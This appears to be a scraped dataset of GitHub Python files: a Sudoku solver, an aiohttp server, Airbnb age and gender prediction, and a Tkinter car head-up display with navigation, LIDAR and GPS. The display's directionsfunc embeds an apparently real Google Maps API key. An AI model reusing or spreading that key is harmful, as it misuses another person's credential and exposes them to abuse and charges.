print(table.get(\"apple\"))\n","repo_name":"RonitGoldental/data_structures","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42307318591","text":"import atexit\nimport logging\nimport logging.config\nimport os\nimport signal\nimport socket\nimport sys\nimport urllib.parse\n\nfrom aiohttp import web\nfrom er import app\nfrom er.util import options\n\noptions.define('listen', default='http://127.0.0.1:8888', help='Server listening address.')\noptions.define('prefork', default=1, help='Number of prefork workers.')\noptions.define('log_format',\n default=('%(log_color)s[%(levelname).1s '\n '%(asctime)s %(module)s:%(lineno)d]%(reset)s %(message)s'),\n help='Log format.')\n\n_logger = logging.getLogger(__name__)\n\n\ndef main():\n logging.config.dictConfig({\n 'version': 1,\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'colored',\n },\n },\n 'formatters': {\n 'colored': {\n '()': 'colorlog.ColoredFormatter',\n 'format': options.log_format,\n 'datefmt': '%y%m%d %H:%M:%S'\n }\n },\n 'root': {\n 'level': 'DEBUG' if options.debug else 'INFO',\n 'handlers': ['console'],\n },\n 'loggers': {\n 'sockjs': {\n 'level': 'WARNING',\n },\n },\n 'disable_existing_loggers': False,\n })\n url = urllib.parse.urlparse(options.listen)\n if url.scheme == 'http':\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)\n host, port_str = url.netloc.rsplit(':', 1)\n sock.bind((host, int(port_str)))\n elif url.scheme == 'unix':\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n os.remove(url.path)\n except FileNotFoundError:\n pass\n sock.bind(url.path)\n else:\n _logger.error('Invalid listening scheme %s', url.scheme)\n return 1\n for i in range(1, options.prefork):\n pid = os.fork()\n if not pid:\n break\n else:\n atexit.register(lambda: os.kill(pid, signal.SIGTERM))\n web.run_app(app.Application(), sock=sock, access_log=None)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"twd2/EventRegistration","sub_path":"er/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8930110633","text":"class SudokuSolver():\n \"\"\"\n This class solves Sudoku boards of a given rank and difficulty.\n A Sudoku board is represented by an n^2 x n^2 grid where n is the rank of the board. \n This means a typical 9x9 Sudoku grid would have rank n = 3.\n\n The easiest method to generate a Sudoku board would be to first a 'solved' 9x9 Sudoku grid\n and remove K elements from this grid. \n\n Attributes:\n rank (int): The rank of the Sudoku board to be generated. For an n^2 x n^2 board, its rank would be n.\n debug (bool): Debug flag\n board (list): List representation of the n^2 x n^2 game board to be solved. \n analysis_board (list): n^2 x n^2 list storing all possible values that may\n be entered into a given cell. \n \"\"\"\n _version = \"0.0.1\"\n \n def __init__(self, board, rank=3, debug=True):\n self.board = board\n self.rank = rank\n self.grid_size = self.rank * self.rank\n self.debug = debug\n\n # Create a representation of the game board with a list of possible values mapped to each game board cell. \n self.analysis_board = [ [[1,2,3,4,5,6,7,8,9] for i in range(self.grid_size)] for i in range(self.grid_size)]\n pass\n\n def display_board(self):\n \"\"\" Display the game board. \"\"\"\n for i in range(0, self.grid_size):\n print(*self.board[i]) \n print() \n pass\n\n def solve(self):\n \"\"\"\n Attempt to solve the provided Sudoku puzzle. Looks at each cell on the game board and determine which \n values may be placed in them. If any cells have trivial entries (where only one value can be entered), enter them.\n\n Returns:\n (int): Number of iterations through the naive algorithm \n required to find the given solution. \n \"\"\"\n if self.debug:\n self.display_board()\n \n iterations = 1\n while not self._check_board():\n\n # Start with naive approach -- look at each cell on the game board and determine which \n # values may be placed in them. If any cells have trivial entries, enter them. \n for i in range(0, self.grid_size):\n for j in range(0, self.grid_size):\n self.analysis_board[i][j] = self._analyze_cell(i, j)\n\n # If any trivial cases are found, fill in the cells with the corresponding values.\n for i in range(0, self.grid_size):\n for j in range(0, self.grid_size):\n if len(self.analysis_board[i][j]) == 1:\n if self.debug:\n print(\"(%d, %d) = %d\" % (i, j, self.analysis_board[i][j][0]))\n self.board[i][j] = self.analysis_board[i][j][0]\n self.analysis_board[i][j] = []\n\n if self.debug:\n print(\"Iteration %d\" % iterations)\n self.display_board()\n input()\n\n iterations += 1\n \n if self.debug:\n print(\"Solution\")\n self.display_board()\n \n return iterations\n\n def _analyze_cell(self, row_index, column_index):\n \"\"\"\n Analyze a given cell to determine what values may \n be validly placed within the cell. \n\n Args:\n row_index (int): Row of the cell to be analyzed. \n column_index (int): Column of the cell to be analyzed. \n Returns:\n (list): List of possible cell values. \n \"\"\"\n if self.board[row_index][column_index] != 0:\n return []\n\n possible_cell_values = [ 1, 2, 3, 4, 5, 6, 7, 8, 9 ]\n for value in range(1,10):\n if self._check_row_for_value(row_index, value) or self._check_column_for_value(column_index, value) or self._check_nonet_for_value(row_index, column_index, value):\n possible_cell_values.remove(value)\n return possible_cell_values\n \n def _check_row_for_value(self, row_index, value):\n \"\"\"\n Check to see if a value is present within a given row.\n\n Args:\n row_index (int): Row that will be checked for the provided value.\n value (int): Value to search the given row for.\n Returns:\n (bool): Flag indicated that value IS within the row.\n \"\"\"\n return value in self.board[row_index]\n\n def _check_column_for_value(self, column_index, value):\n \"\"\"\n Check to see if a value is present with a given column.\n\n Args:\n column_index (int): Column that will be checked for the provided value.\n value (int): Value to search the given column for.\n Returns:\n (bool): Flag indicated that value IS within the column.\n \"\"\"\n return value in [ self.board[i][column_index] for i in range(0, self.grid_size) ]\n\n def _check_nonet_for_value(self, row_index, column_index, value):\n \"\"\"\n Check to see if a value is present with a given nonet, (sub-3x3 grid).\n\n Args:\n row_index (int): Row that will be checked for the provided value.\n column_index (int): Column that will be checked for the provided value.\n value (int): Value to search the given column for.\n Returns:\n (bool): Flag indicated that value IS within the nonet.\n \"\"\"\n nonet_start_row = row_index // 3\n nonet_start_column = column_index // 3\n\n for i in range((3 * nonet_start_row), (3 * nonet_start_row) + 3):\n for j in range(3 * nonet_start_column, (3 * nonet_start_column) + 3):\n if self.board[i][j] == value: \n return True\n return False\n\n def _check_row_accuracy(self, row_index):\n return sum(self.board[row_index]) == 45\n\n def _check_column_accuracy(self, column_index):\n sum = 0\n for i in range(0, self.grid_size):\n sum += self.board[i][column_index]\n return sum == 45\n\n def _check_nonet_accuracy(self, row_index, column_index):\n sum = 0\n for i in range(row_index, row_index+3):\n for j in range(column_index, column_index+3):\n sum += self.board[i][j]\n return sum == 45\n\n def _check_board(self):\n \"\"\" \n Check the game board to see if a solution has been found. \n\n A solution can be said to be 'found' if for all rows, columns, and nonets x the following holds:\n 1. The sum of all elements in x is 45. \n 2. x contains ONLY unique numbers between 1 and 9 (follows from (1)). \n \"\"\"\n result = True\n\n # Iterate through rows and columns, checking sum of elements\n for i in range(0, self.grid_size):\n result &= self._check_column_accuracy(i)\n result &= self._check_row_accuracy(i)\n\n if not result:\n return False\n\n # Iterate through nonets, checking sum of elements\n for i in range(0, self.grid_size, 3):\n for j in range(0, self.grid_size, 3):\n result &= self._check_nonet_accuracy(i, j) \n \n return result\n\nclass KillerSudokuSolver(SudokuSolver):\n _version = \"0.0.0\"\n def __init__(self, board, rank=3, debug=True):\n pass\n\n","repo_name":"afraz98/prodoku","sub_path":"prodoku/sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20845543645","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import *\nfrom IPython.core.display import Image \nfrom sklearn.datasets import make_classification\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.tree import export_graphviz\nimport io\nfrom sklearn.preprocessing import Imputer\nfrom sklearn import preprocessing\nimport lightgbm as lgb\nfrom scipy.stats import mode\nimport re\nfrom datetime import datetime\nfrom lightgbm import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# ---\n\n# ### Date read\n\n# In[7]:\n\nsessions = pd.read_csv(\"sessions.csv\")\ntest_users = pd.read_csv(\"test_users.csv\")\ntrain_users_2 = pd.read_csv(\"train_users_2.csv\")\n\n# ---\n\n# ### Date setting\n\n# In[8]:\n\n\ndef pre_age_set_data(train_users_2, test_users):\n \n check = pd.concat([train_users_2, test_users], ignore_index=True)\n \n check[\"first_affiliate_tracked\"] = check[\"first_affiliate_tracked\"].replace(np.nan, \"untracked\")\n \n check[\"date_account_created\"] = pd.to_datetime(check[\"date_account_created\"], format = \"%Y-%m-%d\")\n check[\"timestamp_first_active\"] = pd.to_datetime(check[\"timestamp_first_active\"], format=\"%Y%m%d%H%M%S\")\n\n s_lag = check[\"timestamp_first_active\"] - check[\"date_account_created\"]\n\n check[\"lag_days\"] = s_lag.apply(lambda x : -1 * x.days)\n check[\"lag_seconds\"] = s_lag.apply(lambda x : x.seconds)\n\n s_all_check = (check['age'] < 120) & (check['gender'] != '-unknown-')\n\n check['faithless_sign'] = s_all_check.apply(lambda x : 0 if x == True else 1)\n \n pre_age = check.drop(\"date_first_booking\",axis = 1)\n \n pre_age['date_account_created_y'] = pre_age[\"date_account_created\"].apply(lambda x : x.year)\n pre_age['date_account_created_m'] = pre_age[\"date_account_created\"].apply(lambda x : x.month)\n pre_age['date_account_created_d'] = pre_age[\"date_account_created\"].apply(lambda x : x.day)\n\n pre_age['timestamp_first_active_y'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.year)\n pre_age['timestamp_first_active_m'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.month)\n pre_age['timestamp_first_active_d'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.day)\n\n pre_age = pre_age.drop(\"date_account_created\" , axis=1)\n pre_age = pre_age.drop(\"timestamp_first_active\" , axis=1)\n \n return check, pre_age\n\n\n# ---\n\n# # Gender\n\n# ### Gender predict data set\n\n# In[11]:\n\n\ndef pre_gen_predict_data(pre_age):\n \n pre_gen_sub = pre_age.filter(items = ['age', 'country_destination', 'id', 'gender'])\n pre_gen_dum = pre_age.filter(items = ['affiliate_channel', 'affiliate_provider',\n 'first_affiliate_tracked', 'first_browser', 'first_device_type',\n 'language', 'signup_app', 'signup_flow',\n 'signup_method', 'date_account_created_y', 'date_account_created_m',\n 'date_account_created_d', 'timestamp_first_active_y',\n 'timestamp_first_active_m', 'timestamp_first_active_d'])\n\n\n pre_gen_dum = pd.get_dummies(pre_gen_dum)\n pre_gen_dum_con = pd.concat([pre_gen_dum, pre_gen_sub], axis=1)\n pre_gen_dum_con[\"gender\"] = pre_gen_dum_con[\"gender\"].replace(['-unknown-', 'OTHER'], np.nan)\n\n pre_gen_mission = pre_gen_dum_con[pre_gen_dum_con[\"gender\"].isnull()].reset_index()\n pre_gen_train = pre_gen_dum_con[pre_gen_dum_con[\"gender\"].notnull()].reset_index()\n\n pre_gen_mission_test = pre_gen_mission.drop(\"index\", axis=1)\n pre_gen_train_test = pre_gen_train.drop(\"index\", axis=1)\n\n pre_gen_mission_test_drop = pre_gen_mission_test.drop(['id', 'age', 'country_destination', \"gender\"], axis=1)\n pre_gen_train_test_drop = pre_gen_train_test.drop(['id', 'age', 'country_destination', \"gender\"], axis=1)\n \n return pre_gen_mission_test, pre_gen_train_test, pre_gen_mission, pre_gen_train, pre_gen_mission_test_drop, pre_gen_train_test_drop\n\n\n# ### Gender predict LightGBM\n\n# In[12]:\n\n\ndef predict_gen_LightGBM(pre_gen_train_test_drop, pre_gen_train_test, pre_gen_mission_test_drop):\n\n X = pre_gen_train_test_drop\n y = pre_gen_train_test[\"gender\"]\n \n model_gen_lgb = lgb.LGBMClassifier(nthread=3)\n model_gen_lgb.fit(X,y)\n\n print(classification_report(y, model_gen_lgb.predict(pre_gen_train_test_drop)))\n model_gen_lgb = model_gen_lgb.predict(pre_gen_mission_test_drop)\n model_gen_lgb = pd.DataFrame(model_gen_lgb)\n \n return model_gen_lgb\n\n\n# ### Gender predict data make CSV\n\n# ---\n\n# # Age\n\n# ### Age predict data set\n\n# In[13]:\n\n\ndef pre_age_predict_data(pre_age):\n \n pre_age['age'] = pre_age['age'].fillna(-1)\n \n pre_age_sub = pre_age.filter(items = ['age', 'country_destination','id'])\n pre_age_dum = pre_age.filter(items = ['affiliate_channel', 'affiliate_provider',\n 'first_affiliate_tracked', 'first_browser', 'first_device_type',\n 'language', 'signup_app', 'signup_flow',\n 'signup_method', 'date_account_created_y', 'date_account_created_m',\n 'date_account_created_d', 'timestamp_first_active_y',\n 'timestamp_first_active_m', 'timestamp_first_active_d'])\n \n pre_age_dum = pd.get_dummies(pre_age_dum)\n pre_age_dum_con = pd.concat([pre_age_dum, pre_age_sub], axis=1)\n pre_age_dum_con[\"age\"] = pre_age_dum_con[\"age\"].replace(-1, np.nan)\n \n pre_age_mission = pre_age_dum_con[pre_age_dum_con[\"age\"].isnull()].reset_index()\n pre_age_train = pre_age_dum_con[pre_age_dum_con[\"age\"].notnull()].reset_index()\n \n pre_age_mission_test = pre_age_mission.drop(\"index\", axis=1)\n pre_age_train_test = pre_age_train.drop(\"index\", axis=1)\n \n pre_age_mission_test_drop = pre_age_mission_test.drop(['id', 'age', 'country_destination'], axis=1)\n pre_age_train_test_drop = pre_age_train_test.drop(['id', 'age', 'country_destination'], axis=1)\n \n return pre_age_mission_test, pre_age_train_test, pre_age_mission, pre_age_train, pre_age_mission_test_drop, pre_age_train_test_drop\n\n\n# In[14]:\n\n\ndef pre_age_predict_data_cat(pre_age_train):\n \n bins = [0, 15, 25, 35, 60, 9999]\n labels = [\"미성년자\", \"청년\", \"중년\", \"장년\", \"노년\"]\n cats = pd.cut(pre_age_train['age'], bins, labels=labels)\n cats = pd.DataFrame(cats)\n \n return cats\n\n\n# ### Age predict LightGBM\n\n# In[15]:\n\n\ndef predict_age_LightGBM(pre_age_train_test_drop, cats, pre_age_mission_test_drop):\n\n X = pre_age_train_test_drop\n y = cats\n \n model_age_lgb = lgb.LGBMClassifier(nthread=3)\n model_age_lgb.fit(X,y)\n\n print(classification_report(y, model_age_lgb.predict(pre_age_train_test_drop)))\n model_age_lgb = model_age_lgb.predict(pre_age_mission_test_drop)\n model_age_lgb = pd.DataFrame(model_age_lgb)\n \n return model_age_lgb\n\n\n# ### Age predict data make CSV","repo_name":"wjy5446/airbnb-new-booking","sub_path":"team_project/airpy/agd.py","file_name":"agd.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"27488646593","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer\n\ndef lemmatize_word(word):\n # 初始化WordNetLemmatizer\n lemmatizer = WordNetLemmatizer()\n\n # 进行词形还原\n lemma_word = lemmatizer.lemmatize(word)\n\n return lemma_word\n\n# 示例单词\nword = \"running\"\n\n# 将单词改为原形\nlemma_word = lemmatize_word(word)\n\n# 输出结果\nprint(\"原始单词:\", word)\nprint(\"原形单词:\", lemma_word)\n","repo_name":"xxrrnn/Reciting-words-based-on-notion-and-anki","sub_path":"TestFiles/test_nlp.py","file_name":"test_nlp.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"3861158091","text":"import urllib.request\nimport json\nimport time\nimport re\nimport obd\nimport overpy\nimport sys\nimport simplejson as json\nimport tkinter\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport serial\nimport time\nimport subprocess\nimport os\nimport pygame\nimport threading\n\n#---------------------------------------- FUNCTIONS BEGIN ------------------------------------------------\n\ndef raise_frame(frame):\n frame.tkraise()\n\ndef cleanhtml(raw_html):\n\tcleanr = re.compile('<.*?>')\n\tcleantext = re.sub(cleanr, '', raw_html)\n\treturn cleantext\n\ndef tick():\n global time1\n # get the current local time from the PC\n time2 = time.strftime('%H:%M:%S')\n # if time string has changed, update it\n if time2 != time1:\n time1 = time2\n clock.config(text=time2)\n # calls itself every 200 milliseconds\n # to update the time display as needed\n # could use >200 ms, but display gets jerky\n clock.after(200, tick)\n\ndef printValuesSPEED():\n global speed1\n # get the current RPM from car\n speed2 = speedConnection.query(obd.commands.SPEED)\n # if rpm string has changed, update it\n if speed2 != speed1:\n speed1 = speed2\n speed.config(text=speed2)\n # calls itself every 200 milliseconds\n # to update the rpm display as needed\n speed.after(200, printValues)\n\n\ndef maxspeed(coordinates, radius):\n\tlat, lon = coordinates\n\tapi = overpy.Overpass()\n\n# fetch all ways and nodes\n\tresult = api.query(\"\"\"\n\t\t\tway(around:\"\"\" + str(radius) + \"\"\",\"\"\" + str(lat) + \"\"\",\"\"\" + str(lon) + \"\"\") [\"maxspeed\"];\n\t\t\t\t(._;>;);\n\t\t\t\t\tout body;\n\t\t\t\t\t \"\"\")\n\tresults_list = []\n\treturnspeed = 25\n\tfor way in result.ways:\n\t\troad = {}\n\t\troad[\"name\"] = way.tags.get(\"name\", \"n/a\")\n\t\troad[\"speed_limit\"] = way.tags.get(\"maxspeed\", \"n/a\")\n\t\t# i deleted the coordinates of the speed limits \n\t\t#nodes = []\n\t\t#for node in way.nodes:\n\t\t# nodes.append((node.lat, node.lon))\n\t\t#road[\"nodes\"] = nodes\n\t\tresults_list.append(road)\n\t\t# return just one value\n\tif results_list:\n\t\treturnspeed = (results_list[0]['speed_limit']).split(' ')[0]\n\n\treturn returnspeed\n# returning only one speed limit\n# do something where if there is no speed limit within 100 m of gps then return 0 to indicate no speed\n\ndef raise_frame_special(frame):\n frame.tkraise()\n directionsfunc()\n\ndef directionsfunc():\n\t# raise_frame(f5)\n\torigin= entry.get()\n\tdestination=entry2.get()\n\t#Google MapsDdirections API endpoint\n\tendpoint = 'https://maps.googleapis.com/maps/api/directions/json?'\n\tapi_key = 'AIzaSyAtnTpeJXirzSS7CRGaIntlXDcJ6V14EGM'\n\torigin = origin.replace(' ','+')\n\tdestination = destination.replace(' ','+')\n\t#Building the URL for the request\n\tnav_request = 'origin={}&destination={}&key={}'.format(origin,destination,api_key)\n\trequest = endpoint + nav_request\n\t#Sends the request and reads the response.\n\tresponse = urllib.request.urlopen(request).read()\n\t#Loads response as JSON\n\tdirections = json.loads(response.decode('utf-8'))\n\tlegs = directions['routes'][0]['legs']\n\t#iterate through the steps and print the html instructions (which are the directions) print distance for length of each step\n\tglobal stepslen\n\tstepslen= len(legs[0]['steps'])\n\t# define lists as the global ones\n\tglobal step_distance_list\n\tglobal step_duration_list\n\tglobal step_startloc_lat_list\n\tglobal step_startloc_lng_list\n\tglobal step_endloc_lat_list\n\tglobal step_endloc_lng_list\n\tglobal step_html_list\n\tglobal step_maneuver_list\n\n\n\n\t# clear the lists \n\tdel step_distance_list[:]\n\tdel step_duration_list[:]\n\tdel step_startloc_lat_list[:]\n\tdel step_startloc_lng_list[:]\n\tdel step_endloc_lat_list[:]\n\tdel step_endloc_lng_list[:]\n\tdel step_html_list[:]\n\tdel step_maneuver_list[:]\n\tfor x in range(stepslen):\n\t\ta=legs[0]['steps'][x]['distance']['text']\n\t\tstep_distance_list.append(a)\n\t\ta=(legs[0]['steps'][x]['duration']['text']).split(' ')[0]\n\t\tstep_duration_list.append(a)\n\t\ta=legs[0]['steps'][x]['start_location']['lat']\n\t\tstep_startloc_lat_list.append(a)\n\t\ta=legs[0]['steps'][x]['start_location']['lng']\n\t\tstep_startloc_lng_list.append(a)\n\t\ta=legs[0]['steps'][x]['end_location']['lat']\n\t\tstep_endloc_lat_list.append(a)\n\t\ta=legs[0]['steps'][x]['end_location']['lng']\n\t\tstep_endloc_lng_list.append(a)\n\t\ta=legs[0]['steps'][x]['html_instructions']\n\t\ta=cleanhtml(a)\n\t\tstep_html_list.append(a)\n\t\tif ('maneuver' not in legs[0]['steps'][x]):\t\t\n\t\t\tstep_maneuver_list.append('none')\n\t\telse:\n\t\t\ta=legs[0]['steps'][x]['maneuver']\n\t\t\tstep_maneuver_list.append(a)\t\n\t\n\tfor x in range(stepslen):\n\t\tprintdirections(x)\t\n\n\traise_frame(f5)\n\n\tline1= Label(f5,bg='black',fg='white')\n\tline2= Label(f5,bg='black',fg='white')\n\tline3= Label(f5,bg='black',fg='white')\n\t# line4= Label(f5,bg='black',fg='white')\n\tline5= Label(f5,bg='black',fg='white')\n\n\tpath=\"none.jpg\"\n\timg=Image.open(path)\n\t# img=img.resize((80,80),Image.ANTIALIAS)\n\tph=ImageTk.PhotoImage(img)\n\tline4=tkinter.Label(f5, image=ph, borderwidth=0, highlightthickness=0)\n\tline4.image=ph\n\n\tline1.pack()\n\tline2.pack()\n\tline5.pack()\n\tline4.pack()\n\tline3.pack()\n\n\tupdate_status(0,line1,line2, line3, line4, line5)\n\n\treturn None \n\n\ndef update_status(instructionholder,line1,line2, line3, line4, line5):\n\n\tline1[\"text\"]=step_html_list[instructionholder]\n\tline2[\"text\"]=\"Total Distance:\" + step_distance_list[instructionholder]\n\tline5[\"text\"]=\"Distance Remaining: 0.1 miles\"\n\tline3[\"text\"]=\"Current Speed Limit: 25 MPH\" # + str(maxspeed((40.516972, -74.435804),50))\n\n\timg=ImageTk.PhotoImage(Image.open(step_maneuver_list[instructionholder]+\".jpg\"))\n\tline4.configure(image=img)\n\tline4.image=img\n\n\tf5.update()\n\ttime.sleep(5)\n\n\tprint(instructionholder)\n\tinstructionholder=instructionholder+1\n\n\tif(instructionholder>=stepslen):\n\t\treturn None\n\n\troot.after(10000, update_status(instructionholder,line1,line2,line3,line4,line5))\n\ndef printdirections(x):\n\t#print the array you want\n\tprint(str(x)+\":\"+ step_distance_list[x])\n\tprint(str(x)+\":\"+ step_duration_list[x])\n\tprint(str(x)+\":\"+ str(step_startloc_lat_list[x]))\n\tprint(str(x)+\":\"+ str(step_startloc_lng_list[x]))\n\tprint(str(x)+\":\"+ str(step_endloc_lat_list[x]))\n\tprint(str(x)+\":\"+ str(step_endloc_lng_list[x]))\n\tprint(str(x)+\":\"+ step_html_list[x])\n\tprint(str(x)+\":\"+ step_maneuver_list[x])\n\treturn None \n\n\ndef leftKey(event):\n\t\n\tglobal currentframe\n\t\t\n\tif (currentframe==1):\n\t\tcurrentframe=7\n\t\traise_frame(f7)\n\n\telif (currentframe==2):\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\telif (currentframe==3):\n\t\tcurrentframe=2\n\t\traise_frame(f2)\n\n\telif (currentframe==4):\n\t\tcurrentframe=3\n\t\traise_frame(f3)\n\telif (currentframe==6):\n\t\tcurrentframe=4\n\t\traise_frame(f4)\n\telif (currentframe==7):\n\t\tcurrentframe=6\n\t\traise_frame(f6)\n\telse:\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\tprint(\"Left Key pressed\")\n\n\ndef rightKey(event):\n\n\tglobal currentframe\n\n\tif (currentframe==1):\n\t\tcurrentframe=2\n\t\traise_frame(f2)\n\n\telif (currentframe==2):\n\t\tcurrentframe=3\n\t\traise_frame(f3)\n\n\telif (currentframe==3):\n\t\tcurrentframe=4\n\t\traise_frame(f4)\n\n\telif (currentframe==4):\n\t\tcurrentframe=6\n\t\traise_frame(f6)\n\telif (currentframe==6):\n\t\tcurrentframe=7\n\t\traise_frame(f7)\n\telif (currentframe==7):\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\telse:\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\tprint(\"Right key pressed\")\n\nglobe_lati=1234\nglobe_long=5678\n\ndef use_cur_location():\n\tglobal globe_lati\n\tglobal glove_long\n\tentry.delete(0,END)\n\tentry.insert(0, str(globe_lati)+\",\"+str(globe_long))\n\n\n# ------------------- LIDAR CODE --------------------------- \n\n\nroot=Tk()\n\n\nlidar_distance=100.0\nlidar_distancelabel=IntVar()\nlidar_distancelabel.set(0)\n\ncurrent_speed=0\n\ndef run_lidar():\n ser = serial.Serial('/dev/ttyUSB1',115200,timeout = 1)\n ser.write(bytes(b'B'))\n ser.write(bytes(b'W'))\n ser.write(bytes(2))\n ser.write(bytes(0))\n ser.write(bytes(0))\n ser.write(bytes(0))\n ser.write(bytes(1))\n ser.write(bytes(6))\n\n global lidar_distance\n global current_speed\n\n while(True):\n time.sleep(1)\n while(ser.in_waiting >= 9):\n if((b'Y' == ser.read()) and ( b'Y' == ser.read())):\n Dist_L = ser.read()\n Dist_H = ser.read()\n Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))\n for i in range (0,5):\n ser.read()\n lidar_distance=Dist_Total/30.48\n lidar_distancelabel.set(lidar_distance)\n if lidar_distance < 5 :\n pygame.mixer.init()\n pygame.mixer.music.load(\"beep.mp3\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n print(lidar_distance)\n\nt=threading.Thread(target=run_lidar)\nt.daemon=True\nt.start()\n\n# ------------------- GPS CODE --------------------------- \n\ndef getLat():\n\n\tpython3_command = \"python getLat.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error = process.communicate()\n\toutput=output.decode('utf8')\n\treturn(output)\n\ndef getLon():\n\n\tpython3_command = \"python getLon.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error = process.communicate()\n\toutput=output.decode('utf8')\n\treturn(output)\n\ncurrent_speed_label=IntVar()\ncurrent_speed_label.set(0)\n\n\ndef getSpeed():\n\n\tpython3_command = \"python getSpeed.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error= process.communicate()\n\toutput=output.decode('utf8')\n\tglobal current_speed\n\tcurrent_speed=output\n\tcurrent_speed_label.set(output)\n\treturn(output)\n\n\nspeedthread=threading.Thread(target=getSpeed)\nspeedthread.daemon=True\nspeedthread.start()\n\n\n# -------------------- MUSIC PLAYER CODE ------------------\n\n\n\n\n\n\n\n\n#---------------------------------------- FUNCTIONS END ------------------------------------------------\n\n\nroot.title('THUD')\n\n\nroot.geometry('{}x{}'.format(800,480))\nroot.configure(bg='black')\n\n\nf1 = Frame(root,width=800, height=480)\nf2 = Frame(root,width=800, height=480)\nf3 = Frame(root,width=800, height=480)\nf4 = Frame(root,width=800, height=480)\nf5 = Frame(root,width=800, height=480)\nf6 = Frame(root,width=800, height=480)\nf7 = Frame(root,width=800, height=480)\n\n\ncurrentframe = 1\n\nf1.configure(bg='black')\nf2.configure(bg='black')\nf3.configure(bg='black')\nf4.configure(bg='black')\nf5.configure(bg='black')\nf6.configure(bg='black')\nf7.configure(bg='black')\n\n\nfor frame in (f1, f2, f3, f4, f5, f6, f7):\n frame.grid(row=0, column=0, sticky='news')\n\n\n\nstepslen=0\nstep_distance_list = []\nstep_duration_list = []\nstep_startloc_lat_list = []\nstep_startloc_lng_list = []\nstep_endloc_lat_list = []\nstep_endloc_lng_list = []\nstep_html_list= []\nstep_maneuver_list = []\n\n\n#----------------------------------------------- FRAME 1 --------------------------------------------------------------------------------------\n\nLabel(f1,text='NAVIGATION',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,padx=170,pady=10)\nLabel(f1,text='Starting Point?',bg='black',fg='white',font=(\"Courier New\",18)).pack(side=TOP,padx=170,pady=10)\nbuttonfirst1=Button(f1, highlightbackground='black',text='Use Current Location',font=(\"Courier New\",18),command=use_cur_location).pack(expand=True, pady=5)\n\nentry = Entry(f1)\nentry.pack(side=TOP,padx=170,pady=10)\n\nLabel(f1,text='Final Destination?',bg='black',fg='white',font=(\"Courier New\",18)).pack(side=TOP,padx=170,pady=10)\n\nentry2 = Entry(f1)\nentry2.pack(side=TOP,padx=170,pady=10)\n\n\nbutton1=Button(f1, highlightbackground='black', text='Get Directions',font=(\"Courier New\",18), command=lambda:raise_frame_special(f5)).pack(expand=True,pady=5)\n\n\n\n#-------------------------------------------------- FRAME 2 --------------------------------------------------------------------------------\n\n\nLabel(f2,text='TIME',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10,padx=170)\n\ntime1 = ''\nclock = Label(f2, font=('times', 100, 'bold'), bg='black', fg='white')\nclock.pack(fill=BOTH, expand=1)\n\ntick()\n\n\n\n\n\n#----------------------------------------------------- FRAME 3 --------------------------------------------------------------------------------\n\n\n\nLabel(f3,text='SPEED', bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f3,textvariable=current_speed_label, bg='black',fg='white',font=(\"Courier New\",70)).pack(side=TOP,pady=10,padx=170)\nprint(current_speed_label)\nLabel(f3,text='MPH',bg='black',fg='white',font=(\"Courier New\",44)).pack(side=TOP,pady=10,padx=170)\n# button5=Button(f3, highlightbackground='black', text='Go to frame 4', command=lambda:raise_frame(f4)).pack(pady=50)\n\n\n\n#---------------------------------------------------- FRAME 4 ---------------------------------------------------------------------------------\n\nLabel(f4,text='OBD DIAGNOSTICS',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f4,text='No alerts at this moment!',bg='black',fg='white',font=(\"Courier New\",26)).pack(side=TOP,pady=20)\n\n\n\n\n#---------------------------------------------------- FRAME 5 ---------------------------------------------------------------------------------\n\n\nLabel(f5,text='DIRECTIONS',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\n\n\n\n\n\n\n# MUSIC PLAYER CODE\nLabel(f6,text='MUSIC PLAYER',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\n\nlistofsongs = []\nv = StringVar()\nsonglabel = 